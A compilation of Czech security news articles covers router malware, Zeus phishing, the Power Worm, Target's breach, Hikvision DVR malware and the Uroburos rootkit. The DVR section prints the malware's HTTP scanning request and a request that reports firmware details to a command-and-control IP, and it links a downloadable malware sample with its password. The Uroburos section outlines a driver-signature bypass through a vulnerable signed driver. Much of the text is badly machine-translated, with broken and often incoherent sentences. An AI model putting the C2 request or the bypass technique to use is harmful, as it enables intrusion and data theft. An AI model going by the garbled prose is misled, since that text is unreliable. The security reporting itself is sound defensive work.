1. Internetem se šíří virus, který cílí na routery. Napadnout tyto brány do světa internetu může buď přímo při procházení zavirovaných webů, nebo prostřednictvím některého počítače v dané síti, který je již zavirován. 2. Ve chvíli, kdy se virus zabydlí v routeru, dokáže buď zcela zablokovat internetové připojení na všech počítačích, a to i chytrých mobilech a tabletech, zapojených v síti. 3. U většiny doposud zaznamenaných útoků virus začal následně zobrazovat výzvu k instalaci aktualizace flash playeru. Snaží se tak vzbudit dojem, že stránky nejdou spustit právě kvůli neaktuálnosti pluginů. 4. Výzva se zobrazovala i v případech, že byly do adresního řádku zadány regulérní weby, které ve skutečnosti k zobrazování obsahu flash player nepotřebují – například Seznam.cz nebo Google.com. 5. Místo aktualizace si lidé stáhnou do počítače virus. Zobrazování hlášek i na regulérních webech je možné právě kvůli tomu, že kyberzločinci ovládají přímo samotný router. Ve skutečnosti tedy žádné ze zadaných serverů vir neobsahují. 6. I když antiviry z napadeného počítače virus odstraní, stále nemají uživatelé vyhráno. Zdroj dalších hrozeb se totiž ukrývá přímo v samotném routeru. A k němu nemá drtivá většina bezpečnostních aplikací vůbec žádný přístup. 7. Řešením je uvést router do továrního nastavení. Jak na to se lidé dozvědí z návodů dodávaných k zařízení. Pokud si nejsou uživatelé jisti, jak správně router nastavit, je vhodné tuto činnost přenechat odborníkovi. 8. Není vyloučeno, že chování viru útočníci upraví. Tím, že se nachází přímo v routerech, může totiž i přesměrovávat stránky na podvodné weby. V takovém případě pak kyberzločinci mohou získat přístup ke všem on-line účtům. 9. Pokud pozorujete ve své síti podobné problémy, můžete zjistit velmi snadno, zda je router zavirován pomocí chytrého telefonu. Místo WiFi se stačí připojit k webu prostřednictvím mobilního připojení. Pokud se výzva k instalaci aktualizace nezobrazí, je router zavirován. Na vlastní kůži se o tom přesvědčil počítačový programátor Jakub Bouček, který objevil zřejmě první napadený router v České republice. Ten Novinkám popsal, jak celý útok probíhal.
„Před rokem jsem rodině pana Tomáše nainstaloval několik nových počítačů, zajistil připojení k internetu a základní zabezpečení. Minulý týden zavolal, že mu počítač blokuje přístup na Seznam.cz,“ uvedl Bouček s tím, že nejprve si myslel, že chyba bude na straně provozovatele webových stránek.
Po chvíli ale přestal fungovat i Google a programátor zjistil, že problém je jinde – internetové připojení blokoval nainstalovaný firewall, který správně rozpoznal, že se do počítače snaží dostat nezvaný návštěvník.
Podvodná výzva k aktualizaci flash playeru se zobrazuje i na legitimních webech, protože je napaden router, brána do světa internetu. Prostřednictvím napadených routerů, tedy bran do světa internetu, se totiž útočníci snažili při všech zaznamenaných útocích propašovat do připojených počítačů škodlivý virus. Při snaze o zobrazení nějaké internetové stránky vyskočí hláška o nutnosti instalace flash playeru. Místo té se ale do PC stáhne virus.
Výzvy k aktualizaci se přitom zobrazují i po zadání regulérních webů, jako jsou například Seznam.cz a Google.com, což může některé uživatele uvést v omyl. To se ale naštěstí v případě pana Tomáše nestalo, protože firewall zafungoval včas a správně.
Doposud se tradovalo, že router může být napaden, pokud nemá uživatel nastaveno silné přístupové heslo k jeho konfiguraci. Tedy zpravidla pokud lidé nechají tovární nastavení. První zaznamenaný případ v České republice však ukázal, že to není tak docela pravda.
„Heslo jsem na routeru nastavoval osobně při instalaci. Sice nebylo hustodémonsky krutopřísné, ale pořád dostatečně silné. Podobné pravidlo platí pro WPA2-TKIP heslo pro WiFi. Útok tedy, předpokládám, byl zaměřen na nějakou technologickou zranitelnost routeru z některého z počítačů v LAN síti,“ konstatoval Bouček.
Ani silná hesla nejsou zárukou bezpečí Ani silná přístupová hesla tedy nejsou zárukou toho, že uživatel bude v bezpečí. „Routery mají velkou moc, která se několik generací podceňovala, a bude chvíli trvat, než výrobci stihnou zareagovat a rozšířit stroje schopné aktivně se na zabezpečení podílet,“ podotkl programátor, který má počítačovou bezpečnost jako koníček.
Narážel přitom na automatické aktualizace routerů. Tuto funkci totiž většina síťových prvků na rozdíl od klasických počítačů nenabízí. Pokud se tedy objeví nějaká zranitelnost a uživatel záplatu nenainstaluje manuálně, zadní vrátka routeru jsou otevřena všem případným útočníkům.
Nakaženým přístrojem, kterého se útok týkal, byl TP-LINK TD-W8901G. V posledních dnech se počty případů zaznamenaných v Česku stále množí.
„Máme od dalších uživatelů potvrzen výskyt tohoto problému i na routerech další značky. Dále máme, zatím nepotvrzenou, informaci, že minimálně v jednom případě byl útok proveden ze zavirovaného PC v lokální síti. Znovu tedy vybízíme uživatele ke zvýšené opatrnosti,“ uvedl bezpečnostní analytik Pavel Bašta z Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.
Podle něj byly podobné útoky zaznamenány v minulých dnech například v Polsku. Desítky dalších uživatelů se staly oběťmi viru v Německu, Anglii nebo například v Americe, což dokládají i reakce postižených na zahraničních diskuzních fórech.
Virus je nutné smazat přímo na routeru Bezpečnostní doporučení z minulého týdne i přes alarmující případ z Česka stále platí. Nezvaného návštěvníka je možné odstranit uvedením routeru do továrního nastavení. Jak na to, se lidé dozvědí z návodů dodávaných k zařízením. Zpravidla se však na síťovém prvku nachází malé tlačítko nazvané reset (většinou je tak malé, že jde stisknout pouze špendlíkem nebo hrotem tužky), stačí jej chvilku držet, dokud nezačnou kontrolky na routeru blikat.
Aby se kyberzločincům nepodařilo znovu nezvaného návštěvníka tímto způsobem do systému propašovat, je nutné u routeru nastavit silné přístupové heslo k jeho konfiguraci. U bezdrátových modelů to samé platí u hesla k WiFi síti, vhodné je také používat silnější bezpečnostní standard, například WPA 2.
Vhodné je také pravidelně sledovat, zda nejsou pro router dostupné nějaké aktualizace přímo od výrobce. Právě v případě zaznamenaném v Česku se totiž škodlivý kód mohl do routeru dostat kvůli chybě softwaru, přestože byl dostatečně zabezpečen.
Pokud si nejsou uživatelé jisti, jak správně router nastavit, je vhodné tuto činnost přenechat odborníkovi.
Chtěli byste nějakou Zeus s vaší kávy?
22.4.2014 Viry
Počítačoví zločinci často chtěli použít falešný dopis přimět lidi k otevření nebezpečné přílohy. Existují dva triky, které dělají tuto práci: zprávy od známého jména (bankovní, sociální sítě, poskytovatel služeb nebo jiné organizace, které by mohly zajímat příjemce) a zajímavý či alarmující podléhají. Útok na základě falešných zpráv, údajně z kávové řetězce Starbucks kombinovat dva.
Zjištěna distribuce tvrdil, že před pár hodinami přítel příjemce vydal za ním slavit zvláštní příležitosti v kavárně Starbucks. Že tajemný přítel si přál zůstat v anonymitě, se těší na intriky ho vytváří, ale byl rozesílání pozvánek s podrobnostmi o speciální nabídce, která je k dispozici v příloze. Nakonec chtěli příjemce skvělý večer.
Všechny zprávy byly rozeslány s vysokou důležitostí. Kromě toho, že adresy, vytvořené na volný mailové služby Gmail a Yahoo!, změnil z dopisu do dopisu, a zdálo se, že náhodně generované kombinace jako incubationg46 @, @ mendaciousker0 a tak dále.
Příloha byl soubor. Exe a zločinci se nesnažil maskovat to s archivem nebo dvojitou příponou. Zdálo se být jisti, rádi by příjemce otevře přílohu bez podezření. Kaspersky Lab detekuje připojený soubor jako Rootkit.Win32.Zbot.sapu - úprava jednoho z nejvíce notoricky známý spyware rodiny Zbot (Zeus). Tyto aplikace jsou využívány zločinci ukrást důvěrné informace. Tato verze Zbot je možné nainstalovat rootkit Rootkit.Win32.Necurs nebo Rootkit.Win64.Necurs, které narušuje fungování antiviru nebo jiných bezpečnostních řešení.
Nový Zeus Variant je dodáván s podepsaný certifikát 8.4.2014 Viry Ještě další varianta Zeus bankovnictví Trojan se vynořil; tohle je převlečený za doklad o Internet Explorer a používá původní digitální certifikát stáhnout rootkit na infikovaných počítačích.
Podle výzkumníků na SSL firmy Comodo , mají více než 200 příkladů Trojan byl objeven v přírodě tak daleko.
Spustit pomocí jednoduchého Man-in-the-Browser (MitB) útoku, Trojan spoléhá na uživatele, a to buď stažením podezřelou přílohu v e-mailu nebo je zasažen využít. Odtud falešný IE dokumentu jde dopředu a to asi docela běžné věci, jako je Zeus krádeže uživatelských dat vstoupil do webových formulářů, přihlašovací údaje a údaje o kreditní kartě, aby k přetrvávání finančním podvodům.
Co je zajímavé je to, že Comodo tvrdí falešný IE soubor je podepsán zdánlivě legitimní osvědčení od švýcarské vývoj software firmy Isonet AG, něco, co je dovoleno malware postupovat nezjištěný antivirových systémů.
Jakmile se spustí soubor zkopíruje do paměti, je popraven a rootkit komponenty z dvou místech jsou staženy. Rootkit je dešifrovat do ovladače a instalován ve skupině Boot Bus Extender a ujistěte se, že může běžet před ostatními řidiči, něco, co pomáhá udržuje Trojan ještě více skryté.
"Jeho účelem je chránit škodlivých souborů a automatické spuštění položky z vymazán uživatelem nebo antivirový software, zvyšuje obtížnost procesu odstranění," napsal Comodo v popisu malware minulý čtvrtek.
Používání falešných a ukradené SSL certifikáty se stalo samozřejmostí mezi zločinci, kteří chtějí kon uživatelů a dát své stroje v ohrožení, to bylo jen před několika měsíci , že zabil falešných certifikátů byli chyceni se maskuje jako legitimní ty ze služeb, jako je Facebook, YouTube a iTunes.
V důsledku velkých název CA hacky jako GlobalSign a DigiNotar za posledních několik let, Google aktualizuje všechny jeho SSL certifikátu 2048-bit RSA až od 1024 loni na podzim a ve středu omezení platnosti certifikátu 60 měsíců , spolu s Mozilla, v naději, že zabrání dalšímu zneužití podřízeného certifikátu.
Pokud jde o zneužití certifikátu Comodo ocitla ve zprávách již v roce 2011 , když se nešťastnou náhodou vydáno osvědčení pro íránské hacker, který pokračoval vydat sám hrst platných certifikátů pro Google, Yahoo, Skype, Mozilla a dalších oblastech. Comodo byl rychle zrušit podvodné certifikáty a nasazení dodatečných auditů a kontrol v boji proti budoucí události.
"Power Worm" PowerShell založen Malware 8.4.2014 Viry
V posledních letech jedním z hlavních vylepšení v prostředí Windows PowerShell byl. S Unix stylu skriptovací schopnosti administrativní úkoly Automatizace okna se stávají možnými. Jednou z hlavních výhod PowerShell je, že je podpora většiny produktů společnosti Microsoft z MS Office aplikací podnikové úrovni, jako je MS SharePoint a MS Exchange.
Ale je možné použít PowerShell pro zlomyslné účely? Pokud si pamatujete Melissa, který byl napsán v MS Office makro, ale to bylo v roce 1999, je to ještě možné?
Podle Trendmicro [1] nový malware bylo zjištěno, že psaný v PowerShell. CRIGENT (aka Power Worm), TrendMicro zjistil dvě škodlivé soubory (W97M_CRIGENT.A a X97M_CRIGENT.A). Tyto soubory dorazil v infikované Wordu nebo Excelu souboru .
Malware stáhne a nainstaluje Tor a Polipo poté se připojit k velení a řízení serveru. Malware shromažďovat určité informace z přístroje uživatele (například IP adresa, výsady Uživatelský účet verze, šířky ...) a zaslat jej na jeho C & C serveru. Ve sčítání Power červ infikuje další soubory Word / Excel, zakázat makra upozornění a bude downgrade infikovaný soubor z Docx / XLSX Doc / XLS.
Nejlepší způsob, jak zastavit takové malware je zakázání makro a ne otevřít libovolný soubor z nedůvěryhodného zdroje.
Microsoft začne blokovat těžko odstranitelný adware
8.4.2014 Viry Společnost zpřísnila svá kritéria pro označení programů za adware a dala vývojářům tři měsíce na to, aby svůj software přizpůsobili novým požadavkům, jinak riskují jeho zablokování.
Největší změna v pravidlech Microsoftu, kterou je zablokování adwaru, vstoupí v platnost od 1. července. V minulosti mohly takové programy normálně existovat až do chvíle, než uživatel přistoupil na některé z opatření doporučované bezpečnostním softwarem.
Zajímavé je, že Microsoft zpřísnil pravidla ve stejnou dobu, kdy představil nástroje, které vývojářům usnadňují zakomponování reklamy do aplikací pro systémy Windows 8.1 a Windows Phone.
„Společnost přehodnotila svá kritéria pro označení aplikací, které se chovají jako adware, na základě principu, že by uživatelé měli mít plnou kontrolu nad svými počítači,“ řekl Michael Johnson z Microsoft Malware Protection Center.
Aby software nebyl identifikován jako adware, měl by zobrazovat pouze reklamu s viditelným tlačítkem pro vypnutí. Reklamy rovněž musí obsahovat název programu, v rámci kterého se zobrazují. Microsoft vývojářům pro tyto účely doporučuje použít klasický symbol „X“ či slovo „zavřít“. Podobně stručně by měl být pojat i název zdrojového programu.
„Používat jen zkratku či logo společnosti nestačí. Stejně tak nestačí uvést, že reklama není součástí dané webové stránky,“ upřesnil dále Johnson.
Dalším důležitým prvkem má být existence standardní metody na odstranění programu v ovládacích panelech Windows nebo z rozhraní prohlížeče. Program navíc musí ve Windows vystopovat pod jediným názvem.
„Od těchto změn máme velká očekávání. Věříme, že vývojáři díky tomu budou moci lépe upravit své reklamy a uživatelé zase dostanou větší kontrolu,“ řekl Johnson.
Adware uživatele obvykle obtěžuje při surfování po internetu a je velkým problémem již dlouhou řadu let. Vývojáři totiž uživatelům obvykle výrazně ztěžují odstranění adwaru z počítače. Často nepomohou ani různé bezpečnostní produkty.
Jednání s katastrofou - Short Malware Incident Response
6.4.2014 Viry
Měl jsem klienta, zavolejte mi v poslední době se plné výpadku služby - jeho servery nebyly dosažitelné, jeho VOIP telefony, dávali mu více statický než hlas, a jeho Exchange server nebyl odesílání nebo přijímání pošty - skoro všechno bylo v režimu offline. I VPN'd v (nebyl jsem na místě), a začal s firewallem, protože to bylo dost špatné, že je to vše, co jsem mohl nejprve dostat z relace VPN. Žádné překvapení, viděl jsem tisíce událostí za sekundu, létání, co vypadalo jako:
Takže hned to vypadá jako malware, vysílání na UDP portech 137 a 138 (NetBIOS Name služeb a datagramů). Můžete'' ll obvykle mají nějakou úroveň těchto téměř jakékoli síti, ale objem v tomto případě dost DOS vysoká téměř vše, co jsem měl to štěstí, aby mé SSH sezení (viz níže), bude dost dlouho, aby si věci pod kontrolou . A ano, to jsem byl já, který byl za pondělní příspěvek na toto téma, pokud to zní povědomě Chcete-li získat síť do jisté zdání použitelnosti, ssh'd jsem každý spínač v pořadí a dal vysílání limity pro každý port přepínače:
Na Cisco: rozhraní gigabitethernet0 / x úroveň bouře-ovládání vysílání 20 (20 procent) nebo na úrovni broadcast storm-control 100 pps (paketů za sekundu) na HP ProCurve: rozhraní x vysílací limit 5 (kde x je procento Celková možná doprava) na HP Comware: int koncert x/0/y vysílání potlačení pps 200 nebo bouře-Zachovat vysílání pps 200 200 (můžete udělat to v procentech, jak dobře, pokud budete chtít)
Kde mohu, snažím se dělat to v paketech za sekundu, takže diskuse s klientem může být "Samozřejmě jsme vypnout tento port se -. Není výrobní provoz v prostředí, které by měly generovat více než 100 přenosů za sekundu"
S tím udělal, jsem se mohl dostat na server syslog. Potřebovali jsme rychle-a-špinavé seznam infikovaných hostitelů, v pořadí, kolik žalu byly příčinou.
Za prvé, pojďme odfiltrovat záznamy o zájmu - vše, co má broadcast adresu a odpovídající netbios portu v něm - to je hostitel okna, takže budeme používat příkazy pro Windows (plus některé příkazy GNU):
typ syslogcatchall.txt | najít "172.xx.yy.255/13"
Ale my opravdu nechceme celou syslog záznam, a tento krátký filtr nám stále zůstává s tisíci akcí projít Pojďme zúžit: za prvé, pojďme používat "cut" vytáhnout jen zdrojovou IP z těchto událostí zájem.
cut-d ""-f 7
Bohužel, toto pole obsahuje i zdrojový port, takže pojďme odstranit, že pomocí "/" jako pole delimeter, a vezměte si pouze zdrojovou IP adresu (pole jedno)
cut-d "/"-f 1
Použijte třídit a uniq-c (-c vám dává počet pro každou zdrojovou IP) a pak použít třídění / r udělat reverzní druh založený na počtu záznamů všeho dohromady, dostaneme:
To nám dalo soubor 15 řádek, seřazená tak, že nejhorší pachatelé byli na vrcholu seznamu, s počtem záznamů pro každého. Můj klient se těchto 15 stanic v režimu offline a začali hands-o posouzení a "atomovku z oběžné dráhy" rutinní na ně, protože jejich AV balíček nezachytil problematický malware. Co ještě můžeme naučit během tohoto incidentu?
Pracovní stanice by nikdy neměla být na serveru VLAN. Každý portu přepínače potřebuje základní zabezpečení nakonfigurován na něj (broadcast limity dnes) a souvisejících, avšak ne přímo souvisejících lekce ...
Jejich hostem bezdrátové sítě byl použit jako základna pro stahování torrentů Jejich hostem bezdrátové sítě měl také infikované pracovní stanice (my vyskočila Shun na firewallu pro tento jeden). Jejich server syslog nebyl byl záplatovaný WSUS - že chudí serveru neviděl patch od prosincového Patch Tuesday
Co nám chybí? Než jsem se dostal místě vám infikované počítače byli všichni znovu zobrazen, takže jsme neměli šanci posoudit skutečný malware. Nevíme, co to dělá kromě této vysílací činnosti, a nemají žádný dobrý způsob, jak pro práci, pro jistotu, jak se dostal do životního prostředí. I když od té doby to destilovaný až na jednu infikovanou notebooku, můj odhad by je to malware, který sebrali doma, ale to je jen odhad v tuto chvíli. Jen poznámku na okraj, ale důležitý - řez, uniq, sed a grep jsou na syslog server, pokud je hostitel * nux, ale pokud narazíte syslog na Windows, tyto příkazy jsou stále do značné míry musíte mít. Jak můžete vidět, s těmito příkazy jsme byli schopni pálit několik milionů záznamů až 15 použitelné, žalovatelné řádků textu během několika minut - opravdu cenný sada nástrojů a dovedností, aby se v případě nehody. Společnost Microsoft poskytuje tyto nástroje ve své "SPU" - Subsystém pro unixové aplikace založené, který byl k dispozici již mnoho let a téměř všechny verze systému Windows. Nebo pokud potřebujete shodit jen některé z těchto příkazů na serveru během incidentu , zvláště pokud nemáte vlastní, že server, můžete dostat to, co potřebujete od gnutools (gnuwin32.sourceforge.net) - Pořád to soupravu na mém notebooku právě pro tento druh situací. Jakmile se dostanete na kloub pomocí těchto nástrojů , zjistíte, že vaše prsty budou typu "grep", místo nálezu nebo Findstr v žádném okamžiku!
Cíl se nepodařilo jednat o malware upozornění a známky porušení 1.4.2014 Viry
Masivní Cílová data porušení by se dalo snadno zabránit pouze tehdy, pokud jeho IT tým měl dost rozumu, aby důkladně podívat na upozornění, že obdržel od 1600000dolar detekce malware nástroj, pomocí FireEye, která byla nasazena méně než rok před porušením. funkce technologie FireEye je jako první linii obrany detekce / a "vydává" počítačové síti organizace tak, že hackeři by útočí na ně. V systému TARGET v případě, že ano, a nástroj všiml první a následné instance malwaru, že útočníci nasazené na něm. Záznamy byly zaznamenány tým v Indii, který byl dohlédněte na věci, a hlásil do hlavního týmu IT v Minneapolis. Bohužel, tento tým strčil asi trochu a rozhodl se dělat nic. "porušení mohla být tam se zastavil bez lidského zásahu. Systém má možnost automaticky vymazal malware, jak je to detekováno., ale podle dvou lidí, kteří ověřovali výkon FireEye je po porušení, bezpečnostní tým Target obrátil tuto funkci vypnout, "Bloomberg Businessweek zprávy . Zdá se, že toto není tak neobvyklé, jak bezpečnostní týmy se často rozhodnou mít poslední slovo, pokud jde o tento typ rozhodnutí. Je smutné, že nereagovala včas a adekvátně k potlačení nebezpečí sami. Podle některých zpráv, je možné, že tým není důvěryhodný nástroj FireEye je dost, když skončil nasazení této technologie v celé IT systému společnosti jen několik měsíců před porušením, která začala v listopadu. Na druhou stranu, když AV systém společnosti - Symantec Endpoint Protection -. Také zahlédl POS paměti škrábání malware kolem Díkůvzdání, a výslovně upozornil na to přijde ze stejného serveru, který FireEye skvrnami hrozba byla pomocí, které by reagovaly Proč neměli ještě třeba určit. Cílová mluvčí Molly Snyder komentoval zprávy tím, že společnost se prozkoumat upozornění, ale odmítl je. "na jejich interpretaci a vyhodnocení této činnosti základě [Target zabezpečení] tým určil, že to neopravňuje k okamžité následné kroky. S odstupem času jsme se zkoumá, zda, pokud byly provedeny různé rozsudky výsledek může být jiný, "uvedla. Dovedu si představit, hlavy se otáčely ve bezpečnostního týmu v pravý čas. Cíl je další chyby se nedělají dobrou práci , když segmentovat své sítě, a ne si všímat malware, který nainstaloval sám, jak a napodobil název legitimní software pro správu IT sady použité Target. "Pokud se bezpečnostní tým Cíl je už navázala na nejčasnějších záznamů FireEye, mohlo by to být hned za hackerů na jejich únikové cestě. malware měl uživatelská jména a hesla pro místa zastávek servery zlodějům vložené do kódu, podle Jaime Blasco, výzkumník pro zabezpečení firemních AlienVault Labs, "komentoval novinářům. "Target zabezpečení by se přihlásili na servery sami, se nachází v Ashburn, Virginia, Provo, Utah, a Los Angeles, a viděl jsem, že odcizené údaje sedí tam čeká denně pickup hackery., ale v době, kdy společnost vyšetřovatelé na to přišel, že údaje byly dávno pryč. " Tyto nové objevy (a předchozí zprávy ), ukazují, že mnoho společností se snadno investovat do dobré technologie, ale jsou samozřejmě skimping na najímání lidí, kteří budou vědět, jak ji používat efektivně. Upřímně doufám, že další společnosti a maloobchodníci budou učit se z těchto chyb, a proto zlepšit jejich obranu.
Více Device Malware: To je důvod, proč vaše DVR napadl svou stanici Synology Disk Station (a nyní s Bitcoin Miner!)
31.3.2014 Malware
Aktualizace: Jen našel to, co vypadá jako Bitcoin horník na infikované DVR. K dispozici jsou další dvě binárky. D72BNr, Bitcoin miner (dle info využití založené na řetězcích) a mzkk8g, které looksl Ike se simplar http agenta, možná stáhnout další nástroje snadno (podobně jako stočit / wget, který není nainstalován na tomto DVR ve výchozím nastavení). Přidám tyto dva soubory https://isc.sans.edu/diaryimages/hikvision.zip krátce.
Minulý týden jsme informovali, že některé skenování hostitelů na portu 5000 ar DVR (přesněji: Hikvision DVR, běžně používané pro záznam videa z kamer [1]).
Dnes jsme byli schopni obnovit malware odpovědnost. Zde si můžete stáhnout https://isc.sans.edu/diaryimages/hikvision.zip malware zde (heslo: infikované).
Malware je umístěn v / dev / cmd.so. Řada dalších podezřelých souborů, kde se nachází v adresáři / dev, které stále potřebujeme obnovit / analyzovat z testovacího systému. Compromisse DVR pravděpodobné, že se stalo přes exponované telnet portu a výchozí heslo uživatele root (12345).
Analýza malware je stále ještě probíhá, a každá pomoc je vítána (viz odkaz na malware výše). Zde jsou některé počáteční zjištění:
- Malware je ARM binární, což znamená, že je zaměřovací přístroje, není typický x86 Linux serverů. - malware vyhledá Synology zařízení vystavené na portu 5000. Žádost http poslal malware:
GET / Webman / info.cgi? Host = HTTP/1.0 Host: [IP adresa cílového]: 5000 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application / x-www-form-urlencoded Content-Length: 0
- Pak extrahuje detaily verze firmware a přenáší je na 162.219.57.8. Žádost použitý pro tento kanál hlášení:
GET / k.php? H =% lu HTTP/1.0 Host: 162.219.57.8 User-Agent: Ballsack Připojení: zavřít
Takže ve zkratce, tento malware je jen skenování pro zranitelné zařízení, a skutečné využití bude pravděpodobně přijde později.
Tvůrci malwaru se tentokrát zaměřili přímo na Česko
31.3.2014 Viry Desetinu veškerých zachycených počítačových hrozeb v Česku představoval tuto středu trojský kůň VBS/CoinMiner – je zjevné, že tuzemskem prošel mohutný počítačový útok, tvrdí
Analytická síť Eset ThreatSense, která sbírá údaje o počítačových hrozbách, zjistila, že šest počítačů z tisíce se 26. 3. 2014 stalo terčem pokusu o zapojení do sítě, která se podílí na těžbě virtuální měny Bitcoin.
Na vině byl trojský kůň VBS/CoinMiner, který existuje ve dvou variantách, z nichž jedna se popsala už v prosinci 2012 a druhá v září 2013. Šíří se ve vlnách s přibližně tříměsíční periodou. A poslední vlna se zacílila především na Českou republiku a na Slovensko.
V Česku byl podíl této hrozby na všech zachycených hrozbách 9,9 procenta a na Slovensku to bylo 7,92 procenta. Zemí s třetím nejvyšším výskytem – ale ve výši pouhých 8 promile - bylo Řecko.
VBS.CoinMiner je rodina skriptů vytvořených ve Visual Basicu. Jsou to malé, nenápadné soubory (často zašifrované), které se díky tomu snadno šíří buď stahováním z webových stránek, nebo v emailech.
Nejsou to ale programy, které by dělaly samotnou těžbu bitcoinů. Trojské koně mají pouze za úkol tyto výkonné programy stahovat či updatovat a stahovat pro ně konfigurace, připravovat pro ně prostředí (například přidáním výjimky do firewallu nebo jeho vypnutím), a také je spouštět.
Eset také oznámil, že na trh uvedl novou verzi řešení Cyber Security Pro a Cyber Security, antimalware pro počítače Mac.
Mezi hlavní vylepšení patří například nový modul Anti-Phishing, který přidává novou vrstvu ochrany: hlídá, zda navštívená internetová stránka je skutečně legitimní web, nebo zda nejde o podvodnou stránku, která se snaží získat citlivé osobní údaje, jako jsou uživatelská jména a hesla nebo informace o bankovních účtech či kreditních kartách.
Inovovaný modul Social Media Scanner zase zlepšuje ochranu facebookového účtu uživatele i jeho přátel a navíc přidává vrstvu ochrany pro Twitter. Umožňuje mj. skenovat účty, a to buď automaticky, nebo na vyžádání a ukazuje i aktuální úroveň nastavení ochrany soukromí na Facebooku i Twitteru nebo doporučuje případně změnu nastavení. Novinkou je i přepracované uživatelské rozhraní.
Uroburos - Deeper cestování do zmírnění ochrany jádro
7.3.2014 Viry Malware využívá novou technologii obejít ochranu jádra systému Windows ' Uroburos již byla popsána jako velmi sofistikované a vysoce komplexní malware v našem datovém červeném papíru G, kde jsme měli podívat na chování malware. Tento předpoklad je opět podporován, při pohledu na jeho instalačního procesu. Uroburos používá techniku dosud známé veřejnosti, aby se vyhnula Driver Signature Enforcement Microsoft, podstatnou část zabezpečení systému Windows ". V první řadě bychom chtěli poslat pozdravy a díky lidé jsou aktivní na kernelmode.info fóru , zejména R136a1 a EP_X0FF. Poskytli zdatní analýzu Podpis prosazování Driver obchvatu, která obohacuje celkový pochopení věci.
Úvod Následující článek analýza je úzce spojena s Rudou knihu G Datovy o Uroburos, zveřejněné v pátek 28 února. Papír si můžete stáhnout zde: https://www.gdata.de/rdk/dl-en-rp-Uroburos Pro kolegy výzkumníky, zajišťujeme hash vzorku použitého pro tuto následnou článek: SHA256: 33460a8f849550267910b7893f0867afe55a5a24452d538f796d9674e629acc4 Tento soubor je 64-bit driver, sestaven v roce 2011.
Kernel Patch Protection Definice
Většina rootkitů používat především úpravy jádra nebo jádro záplatování, aby zakryli své činnosti a změnit chování infikovaného systému. Chcete-li chránit operační systém Windows, Microsoft přidal nové technologie k jeho 64-bit Windows verze. Technologie jádra Patch Protection (aka PatchGuard) kontroluje integritu jádra systému Windows, aby se ujistil, že žádné důležité součásti jsou modifikovány. V případě, že je zjištěn škodlivý modifikace jádra, funkce KeBugCheckEx () je vykonán, volána s argumentem s hodnotou 0x109 (CRITICAL_STRUCTURE_CORRUPTION) jako chyba kódu. Výsledkem je vypnutí systému s modrou obrazovkou.
Microsoft uvádí, že technologie, ochrana proti změnám jádra zabraňuje následující úpravy: • měnit tabulky systémových služeb, například tím, hákování tabulky KeServiceDescriptor • upravit přerušení Descriptor Table (IDT) • upravit Global Descriptor Table (GDT) Stohy • využití jádra, které nejsou přidělovány podle jádra • náplasti jakákoliv část jádra
Uroburos zmírnění
Vývojáři Uroburos 'používá stejné vložené háčky, bylo vysvětleno v předchozím červeném papíru , aby se vyhnula Kernel Patch Protection. Cílem útočníka je háček funkci KeBugCheckEx (), aby se zabránilo manipulaci s bug kód 0x109. Screenshot níže ukazuje fragment kódu, ve kterém je adresa KeBugCheckEx () uloženou v qword_787D8
Adresa Screenshot z KeBugCheckEx ()
Následující obrázek ukazuje, že Uroburos kontroluje, zda chyba kód rovná 0x109 V případě, že chcete získat další informace týkající se techniky používané vývojáři, doporučujeme následující odkaz:
Rootkity jsou většinou řidiči, který používají k práci v prostoru jádra. Aby se zabránilo tento druh malware, Microsoft vytvořila Driver zásady podepisování za jeho 64-bitových verzích Windows Vista a novějších verzích. Chcete-li načíst ovladače, musí být soubor. Sys podepsané oprávněným vydavatelem. Vývojáři mohou zakázat vynucení proces Driver Signature během vývojové fáze řidiče, což znamená, že developer nemusí podepsat každou zkompilovanou verzi ovladače během vývojové fáze. V tomto případě, stolní stroje se změní a zobrazí se následující zpráva v pravém dolním rohu: "Test Mode". Vlajka, s níž je uložen aktuální stav politiky se nazývá g_CiEnabled. Hodnota g_CiEnabled je během spouštěcí fáze systému Windows, a považován za "statické" v běhu. To znamená, že Windows předpokládá, že hodnota je nastavena správně a nemění se v průběhu běhu.
Uroburos zmírnění
Vývojáři Uroburos 'používá nové techniky pro zakázání vynucení podpisu ovladače. V našem případě se používá chybu zabezpečení v legitimně podepsané ovladače zakázat politiku! Během instalace Uroburos, ovladač Oracle VirtualBox (verze 1.6.2) je nainstalován na cílené systému. Tento ovladač (VBoxDrv.sys) je podepsáno: Následně zabezpečení v tomto ovladači (CVE-2008 - 3431) se používá k přepsání režimu jádra adresu s 0 z uživatelského prostoru (pomocí DeviceIoControl ()). V našem případě, že útočníci použili tuto chybu zabezpečení zneužít k přepsání g_CiEnabled a zakázání vynucení podpisu ovladače, zatímco systém byl spuštěn, a tím mění hodnotu od 1 (= true) na 0 (= False). Což vede k systému Windows věřit, že to běží v testovacím režimu. V testovacím režimu to není žádný velký problém načíst ovladač rootkit bez předchozího upozornění.
Screenshot: VBoxDrv.sys podpis
Závěr Dříve jsme tvrdili, že Uroburos je velmi komplexní a velmi sofistikovaný malware, programuje kvalifikovaných lidí. Tento předpoklad je potvrzen ještě jednou podle výše uvedené analýzy Uroburos "instalační techniky. Vývojáři museli vypořádat s prosazováním zabezpečení systému Microsoft Windows. Museli najít způsob, jak obejít technologii Kernel Patch Protection a také prosazování Driver Signature. Technika používaná k obejít ochranu proti změnám jádra byla zdokumentována na internetu, a proto není zcela nová.
Ale o uplatňování Driver Signature, je to poprvé, co jsme vidět malware using zranitelnost ve legitimně podepsaný ovladač zakázat jeho užívání je Tento příklad ukazuje, omezení procesu podpisu. Obecně platí, že datum vypršení platnosti podpisu je nastaven na stát, několik let po datu vytvoření. V případě, že je zjištěno jakékoliv zranitelnosti, patch je k dispozici, ale starý binární je stále k dispozici a platné, v případě, že je certifikát odvolán autorem / autora podpisu a nastavit na CRL, na seznamu zneplatněných certifikátů .
Ale, zrušení podpis je pouze prvním krokem v procesu ochrany, protože každý systém, který musí zkontrolovat podpis musí mít přístup k až k dnešnímu dni CRL. A i v případě, že je systém aktualizovaný seznam CRL, Uroburos Autoři jsou jistě myslel, že je dostatečně zručný manipulovat s ověřovací proces operačního systému je použití bez upozornění uživatele. Tak, to je poprvé, co vidíme ty dvě techniky obejít mechanismy ochrany systému Windows "v divočině. Očekáváme, že budou používány další malware v budoucnosti, samozřejmě.
